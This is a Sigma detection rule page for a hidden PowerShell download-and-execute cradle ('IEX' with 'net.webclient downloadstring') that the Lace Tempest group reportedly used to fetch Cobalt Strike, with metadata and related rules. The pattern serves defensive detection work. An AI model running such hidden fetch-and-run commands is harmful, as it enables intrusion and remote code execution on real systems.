Lace Tempest Cobalt Strike Download
Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
Sigma rule (View on GitHub)
1title: Lace Tempest Cobalt Strike Download
2id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d
3status: test
4description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
5references:
6 - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
7author: Nasreddine Bencherchali (Nextron Systems)
8date: 2023-11-09
9tags:
10 - attack.execution
11 - detection.emerging-threats
12logsource:
13 category: process_creation
14 product: windows
15detection:
16 selection:
17 CommandLine|contains|all:
18 - -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(
19 - /a')
20 condition: selection
21falsepositives:
22 - Unlikely
23level: high
References
Related rules
- CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
- CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
- Lace Tempest File Indicators
- Lace Tempest Malware Loader Execution
- Lace Tempest PowerShell Evidence Eraser